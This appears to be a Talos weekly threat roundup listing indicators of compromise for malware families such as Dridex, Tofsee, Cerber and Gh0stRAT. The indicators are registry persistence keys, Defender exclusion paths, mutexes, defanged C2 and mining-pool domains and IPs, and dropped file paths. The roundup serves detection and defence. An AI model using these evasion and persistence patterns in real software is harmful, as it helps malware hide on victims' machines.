Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 5 and March 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats. As a reminder, the information provided for the following threats is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting: spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post lists only 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique's behavior and the brightest indicating that the behavior was observed in 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Packed.Tofsee-9840179-0 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Packed.Dridex-9839033-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Johnnie-9838888-0 | Trojan | Johnnie, also known as Mikey, is a malware family that focuses on persistence and is known for its plugin architecture.
Win.Downloader.Razy-9839515-0 | Downloader | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, and then sends it to a command and control (C2) server. Information collected may include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Malware.Zusy-9839004-0 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Malware.Cerber-9839041-0 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber", although in more recent campaigns, other file extensions are used.
Win.Packed.CoinMiner-9839148-1 | Packed | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog at /blocking-cryptomining.
Win.Malware.Gh0stRAT-9839666-0 | Malware | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Trojan.Zegost-9840060-0 | Trojan | Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Threat Breakdown

Win.Packed.Tofsee-9840179-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 132 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
129
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ohvbaiod
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\gzntsagv
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
5
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
43[.]231[.]4[.]7 130
185[.]254[.]190[.]218 130
217[.]172[.]179[.]54 129
5[.]9[.]72[.]48 129
130[.]0[.]232[.]208 129
144[.]76[.]108[.]82 129
185[.]253[.]217[.]20 129
45[.]90[.]34[.]87 129
157[.]240[.]18[.]174 128
172[.]217[.]6[.]196 118
104[.]47[.]9[.]33 91
64[.]233[.]186[.]26/31 86
172[.]217[.]197[.]26/31 86
104[.]47[.]8[.]33 85
74[.]125[.]128[.]26/31 85
209[.]85[.]202[.]26/31 80
172[.]253[.]120[.]26/31 80
37[.]1[.]217[.]172 65
87[.]250[.]250[.]22 61
104[.]111[.]240[.]250 60
216[.]239[.]38[.]21 57
216[.]239[.]36[.]21 53
163[.]172[.]32[.]74 43
142[.]250[.]64[.]99 35
216[.]239[.]34[.]21 34

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 130
microsoft-com[.]mail[.]protection[.]outlook[.]com 130
microsoft[.]com 130
schema[.]org 129
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 129
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 129
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 129
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 129
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 129
accounts[.]google[.]com 129
drive[.]google[.]com 129
mail[.]google[.]com 129
maps[.]google[.]com 129
news[.]google[.]com 129
play[.]google[.]com 129
www[.]google[.]com 129
www[.]youtube[.]com 129
www[.]instagram[.]com 128
gmail-smtp-in[.]l[.]google[.]com 91
alt4[.]gmail-smtp-in[.]l[.]google[.]com 91
alt1[.]gmail-smtp-in[.]l[.]google[.]com 88
alt3[.]gmail-smtp-in[.]l[.]google[.]com 82
alt2[.]gmail-smtp-in[.]l[.]google[.]com 81
www[.]amazon[.]com 77
work[.]a-poster[.]info 65

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 130
%SystemRoot%\SysWOW64\config\systemprofile:.repos 130
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 128
%TEMP%\<random, matching '[a-z]{8}'>.exe 127
%System32%\config\systemprofile:.repos 25
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 21
%TEMP%\uwrxqdn.exe 2
%TEMP%\oqlrkxh.exe 2
%TEMP%\supvobl.exe 1
%TEMP%\fhciboy.exe 1
%System32%\gcshmqs\nmacqnog.exe (copy) 1
%System32%\tbnresb\jddufofh.exe (copy) 1
%System32%\zkqqcbe\ygvzmktt.exe (copy) 1
%System32%\desthnb\jmsmbmxd.exe (copy) 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9839033-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
25
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 25
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
172[.]217[.]11[.]14 25
104[.]23[.]99[.]190 12
104[.]23[.]98[.]190 7
173[.]194[.]175[.]138/31 6
23[.]3[.]13[.]88 4
173[.]194[.]175[.]113 3
173[.]194[.]175[.]102 3
23[.]3[.]13[.]154 2
173[.]194[.]175[.]100/31 2
104[.]18[.]10[.]39 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
pastebin[.]com 25
w[.]google[.]com 25
www3[.]l[.]google[.]com 14
www[.]y9fapyp2uj[.]com 1
www[.]zfonb8mzne[.]com 1
www[.]wqcet3q9xk[.]com 1
www[.]x2mtleacte[.]com 1
www[.]uulwhfrn1y[.]com 1
www[.]x7nzjt3faq[.]com 1
www[.]yv3pcwfezq[.]com 1
www[.]1a0oqiraht[.]com 1
www[.]f7e6qiazk3[.]com 1
www[.]8e5zciqqo3[.]com 1
www[.]ikdappafza[.]com 1
www[.]sakjgai9ve[.]com 1
www[.]weyfiyrfb2[.]com 1
www[.]l0ms363fcy[.]com 1
www[.]daazceg7iv[.]com 1
www[.]kfu2bhdpqy[.]com 1
www[.]ladghllkjr[.]com 1
www[.]ekri9xvgvw[.]com 1
www[.]xye3nljvn9[.]com 1
www[.]nt8dlgd5yd[.]com 1
www[.]wupojupilw[.]com 1
www[.]wv6tzcb7m9[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 25
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 4
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 4
\Temp\HncDownload\Update.log 2

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Johnnie-9838888-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ProPlayer
9
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
2
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\OPENWITHLIST 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windir
1
<HKCU>\SOFTWARE\NETFLIX 1
<HKCU>\SOFTWARE\NETFLIX
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\NETFLIX
Value Name: NewIdentification
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Java
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ProPlayerX
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UpdateManager
1
<HKCU>\SOFTWARE\93BEDF521AC945 1
<HKCU>\SOFTWARE\93BEDF521AC945
Value Name: [kl]
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RuntimeBroker
1
Mutexes | Occurrences
e9c1286a28d82a2d0ee6 2
7868gyiugbio 2
Windows 1
_x_X_UPDATE_X_x_ 1
_x_X_BLOCKMOUSE_X_x_ 1
_x_X_PASSWORDLIST_X_x_ 1
***MUTEX***_SAIR 1
***MUTEX*** 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647490 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726474A4 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726474CC 1
2AC1A572DB6944B0A65C38C4140AF2F47d47264758C 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726476DC 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647710 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647750 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647828 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726478B0 1
4M9691 1
Global\a4e40ac0-7cfb-11eb-b5f8-00501e3ae7b6 1
2AC1A572DB6944B0A65C38C4140AF2F47d4741B6134 1
QSR_MUTEX_8J5zgiUkz6aC2r23ow 1
QSR_MUTEX_N5906JU6VgxV3XlvX0 1
Global\bda31061-7cfb-11eb-b5f8-00501e3ae7b6 1
93bedf521ac945 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
208[.]95[.]112[.]1 5
41[.]214[.]187[.]35 4
23[.]105[.]131[.]235 3
104[.]140[.]201[.]42 2
172[.]111[.]154[.]46 2
104[.]140[.]244[.]186 1
173[.]194[.]207[.]102 1
23[.]6[.]69[.]99 1
209[.]85[.]232[.]155 1
140[.]82[.]114[.]4 1
20[.]36[.]253[.]92 1
65[.]55[.]44[.]109 1
151[.]101[.]250[.]217 1
23[.]218[.]140[.]208 1
35[.]244[.]181[.]201 1
34[.]107[.]221[.]82 1
34[.]216[.]80[.]151 1
185[.]199[.]109[.]133 1
160[.]20[.]145[.]218 1
34[.]215[.]65[.]187 1
99[.]84[.]208[.]128 1
70[.]113[.]1[.]76 1
35[.]168[.]178[.]126 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
ip-api[.]com 5
hicham157484[.]ddns[.]net 4
newanonjoe[.]ddns[.]net 3
pool[.]supportxmr[.]com 2
pool-nyc[.]supportxmr[.]com 2
multii[.]ddns[.]net 2
github[.]com 1
e11290[.]dspg[.]akamaiedge[.]net 1
prod[.]balrog[.]prod[.]cloudops[.]mozgcp[.]net 1
prod[.]detectportal[.]prod[.]cloudops[.]mozgcp[.]net 1
shavar[.]prod[.]mozaws[.]net 1
search[.]r53-2[.]services[.]mozilla[.]com 1
d1zkz3k4cclnv6[.]cloudfront[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
detectportal[.]firefox[.]com 1
aus5[.]mozilla[.]org 1
search[.]services[.]mozilla[.]com 1
go[.]microsoft[.]com 1
shavar[.]services[.]mozilla[.]com 1
tracking-protection[.]cdn[.]mozilla[.]net 1
docs[.]microsoft[.]com 1
wcpstatic[.]microsoft[.]com 1
www-google-analytics[.]l[.]google[.]com 1
www[.]google-analytics[.]com 1
w[.]usabilla[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
%APPDATA%\ProPlayer 9
%APPDATA%\ProPlayer\Player.exe.exe 9
%APPDATA%\Logs\03-04-2021 5
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 3
%APPDATA%\Logs 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\yGtjmGiLEP.url 2
%ProgramData%\IGPNMyGXrV 2
%ProgramData%\IGPNMyGXrV\cfg 2
%ProgramData%\IGPNMyGXrV\cfgi 2
%ProgramData%\IGPNMyGXrV\nslookup 2
%ProgramData%\IGPNMyGXrV\r.vbs 2
%APPDATA%\Windir 2
%APPDATA%\RuntimeBroker 2
%APPDATA%\logs.dat 1
%TEMP%\UuU.uUu 1
%TEMP%\XX--XX--XX.txt 1
%TEMP%\XxX.xXx 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk 1
%APPDATA%\Windir\windir.exe 1
%TEMP%\j5Dvp.exe 1
%APPDATA%\RuntimeBroker\RuntimeBroker.exe.exe 1
%TEMP%\QCIGY.JPG 1
%TEMP%\eSYby.jpg 1
%APPDATA%\ProPlayerX\PlayerX.exe.exe 1
%APPDATA%\Microsoft\Windows\Templates\Windows.lnk 1

*See JSON for more IOCs

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Downloader.Razy-9839515-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
199[.]101[.]134[.]236/31 16
74[.]117[.]178[.]56 13
74[.]117[.]178[.]90 13
199[.]101[.]134[.]234/31 12
74[.]117[.]178[.]93 9
74[.]117[.]178[.]58 7
200[.]147[.]3[.]199 5
200[.]147[.]100[.]53 3
200[.]147[.]35[.]224 2
199[.]80[.]53[.]87 2
74[.]117[.]178[.]19 2
74[.]117[.]178[.]45 2
74[.]117[.]178[.]62 2
199[.]101[.]133[.]31 2
199[.]101[.]133[.]171 2
74[.]117[.]178[.]66 1
199[.]101[.]133[.]9 1
200[.]98[.]206[.]229 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]youtube[.]com 19
twitter[.]com 19
www[.]facebook[.]com 19
plus[.]google[.]com 19
blog[.]4shared[.]com 19
e[.]4shared[.]com 19
static[.]4shared[.]com 19
www[.]4shared[.]com 19
dc180[.]4shared[.]com 8
dc270[.]4shared[.]com 8
dc317[.]4shared[.]com 8
dc361[.]4shared[.]com 8
dc424[.]4shared[.]com 8
dc242[.]4shared[.]com 7
dc313[.]4shared[.]com 7
e[.]indice[.]uol[.]com[.]br 5
dc185[.]4shared[.]com 5
dc239[.]4shared[.]com 5
dc253[.]4shared[.]com 5
dc441[.]4shared[.]com 5
ricolombard[.]sites[.]uol[.]com[.]br 4
dc280[.]4shared[.]com 3
amazonas[.]uol[.]com[.]br 2
gmbrum[.]sites[.]uol[.]com[.]br 1
dc249[.]4shared[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe 12
%SystemRoot%\SysWOW64\dosxa.exe 9
%SystemRoot%\SysWOW64\amd.exe 8
%System32%\amd.exe 8
%System32%\dosxa.exe 8
%SystemRoot%\SysWOW64\dossa.exe 7
%System32%\GetDiskSerial.dll 6
%System32%\dossa.exe 6
%SystemRoot%\SysWOW64\GetDiskSerial.dll 5
%SystemRoot%\SysWOW64\msngrss.exe 5
%SystemRoot%\SysWOW64\lisa.dll 5
%SystemRoot%\SysWOW64\sm.bat 5
%SystemRoot%\SysWOW64\sm.dll 5
%System32%\msngrss.exe 5
%System32%\lisa.dll 5
%System32%\sm.bat 5
%System32%\sm.dll 5
%SystemRoot%\SysWOW64\lic.dll 4
%SystemRoot%\SysWOW64\sma.dll 4
%System32%\lic.dll 4
%System32%\sma.dll 4
%System32%\drivers\etc\hosts 3
%System32%\sUvycDUb.exe 3
%SystemRoot%\SysWOW64\BCxpO.dll 2
%SystemRoot%\SysWOW64\sUvycDUb.dll 2

*See JSON for more IOCs

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zusy-9839004-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\CLASSES\C4070} 2
<HKLM>\SOFTWARE\CLASSES\C4070} 2
<HKLM>\SOFTWARE\CLASSES\2..42AC 2
<HKLM>\SOFTWARE\CLASSES\2..42AC 2
<HKLM>\SOFTWARE\CLASSES\C4070}
Value Name: Äțⶈț㥻䉅〹㉄ⴳ㕃㥆㐭〱ⴴ㔸㡁㐭䐷㝄㙆㑃㜰細
1
<HKLM>\SOFTWARE\CLASSES\m 1
<HKLM>\SOFTWARE\CLASSES\m 1
<HKLM>\SOFTWARE\CLASSES\m
Value Name: ⸠ȂဠȂ
1
<HKLM>\SOFTWARE\CLASSES\C4070}
Value Name: ÄȂⶈȂ㥻䉅〹㉄ⴳ㕃㥆㐭〱ⴴ㔸㡁㐭䐷㝄㙆㑃㜰細
1
<HKLM>\SOFTWARE\CLASSES\`..8-. 1
<HKLM>\SOFTWARE\CLASSES\`..8-. 1
<HKLM>\SOFTWARE\CLASSES\`..8-.
Value Name: ⸀ȯÄȯ
1
<HKLM>\SOFTWARE\CLASSES\2..42AC
Value Name: ࿈ȯླྀȯ⼠ȯ摨dni
1
<HKLM>\SOFTWARE\CLASSES\2{{42AC 1
<HKLM>\SOFTWARE\CLASSES\2{{42AC 1
<HKLM>\SOFTWARE\CLASSES\2{{42AC
Value Name: ླྀɻ࿈ɻླྀɻ摨dni
1
<HKLM>\SOFTWARE\CLASSES\2&&42AC 1
<HKLM>\SOFTWARE\CLASSES\2&&42AC 1
<HKLM>\SOFTWARE\CLASSES\2&&42AC
Value Name: ࿈&ླྀ&⻀&摨dni
1
<HKLM>\SOFTWARE\CLASSES\27742AC 1
<HKLM>\SOFTWARE\CLASSES\27742AC 1
<HKLM>\SOFTWARE\CLASSES\27742AC
Value Name: ླྀȷ࿈ȷླྀȷ摨dni
1
<HKLM>\SOFTWARE\CLASSES\242AC 1
<HKLM>\SOFTWARE\CLASSES\/42AC 1
<HKLM>\SOFTWARE\CLASSES\/42AC 1
Mutexes | Occurrences
Global\<random guid> 10
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
152[.]32[.]185[.]133 15
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
api[.]jwhss[.]com 15
update[.]jwhss[.]com 15
Files and/or directories created | Occurrences
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\public.ini 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\msbase\msbase.ini 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\msbase 20

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Cerber-9839041-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Mutexes | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 17
shell.{<random GUID>} 14
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
149[.]202[.]64[.]0/27 17
149[.]202[.]122[.]0/27 17
149[.]202[.]248[.]0/22 17
172[.]67[.]157[.]138 9
178[.]128[.]255[.]179 8
104[.]21[.]50[.]61 8
104[.]20[.]20[.]251 6
172[.]67[.]2[.]88 6
104[.]20[.]21[.]251 5
104[.]199[.]222[.]174 2
151[.]139[.]128[.]10 2
52[.]2[.]101[.]52 1
104[.]25[.]47[.]99 1
104[.]24[.]96[.]153 1
104[.]24[.]97[.]153 1
104[.]25[.]48[.]99 1
34[.]199[.]22[.]139 1
104[.]26[.]14[.]247 1
104[.]26[.]15[.]247 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
api[.]blockcypher[.]com 8
btc[.]blockr[.]io 8
chain[.]so 8
bitaps[.]com 8
p27dokhpz2n7nvgr[.]1j9r76[.]top 4
sochain[.]com 2
w3z5q8a6[.]stackpathcdn[.]com 2
crl[.]comodoca4[.]com 2
crl[.]usertrust[.]com 2
Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 17
%TEMP%\d19ab989 17
%TEMP%\d19ab989\4710.tmp 17
%TEMP%\d19ab989\a35f.tmp 17
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 17
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 17
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 14
%TEMP%\24e2b309\1719.tmp 12
%TEMP%\24e2b309\4436.tmp 12
%TEMP%\<random, matching [a-z0-9]{8}\[a-f0-9]{4}>.tmp 2

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Packed.CoinMiner-9839148-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 30 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Services.exe
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oracleservice.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: System32.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UpdateOneDriveSystem.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: winxm64.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
49[.]12[.]80[.]40 5
49[.]12[.]80[.]38/31 5
54[.]37[.]7[.]208 4
18[.]210[.]126[.]40 3
131[.]153[.]56[.]98 3
5[.]196[.]13[.]29 2
51[.]255[.]34[.]118 2
88[.]198[.]117[.]171 2
159[.]69[.]189[.]115 2
51[.]15[.]69[.]136 1
51[.]15[.]65[.]182 1
51[.]15[.]54[.]102 1
217[.]182[.]169[.]148 1
51[.]15[.]58[.]224 1
5[.]196[.]23[.]240 1
51[.]15[.]78[.]68 1
94[.]130[.]165[.]87 1
51[.]68[.]21[.]188 1
51[.]254[.]84[.]37 1
194[.]5[.]249[.]24 1
51[.]15[.]67[.]17 1
139[.]99[.]101[.]198 1
136[.]243[.]49[.]177 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
xmr[.]pool[.]minergate[.]com 5
pool[.]minexmr[.]com 4
pool[.]bmnr[.]pw 4
xmrpool[.]eu 4
xmr-eu1[.]nanopool[.]org 3
pool[.]hashvault[.]pro 3
gulf[.]moneroocean[.]stream 3
xmr[.]givemexyz[.]in 1
vbbbbbbbbbb 1
xmr-eu2[.]nanopool[.]org 1
xmr-asia1[.]nanopool[.]org 1
Files and/or directories created | Occurrences
%APPDATA%\WinCFG 30
%APPDATA%\WinCFG\Libs 30
%APPDATA%\WinCFG\Libs\WR64.sys 30
%TEMP%\Services.exe 13
%APPDATA%\Services.exe 7
%APPDATA%\System32.exe 1
%TEMP%\svchost.exe 1
%HOMEPATH%\Services.exe 1
%HOMEPATH%\oracleservice.exe 1
%TEMP%\UpdateOneDriveSystem.exe 1
%APPDATA%\winxm64.exe 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


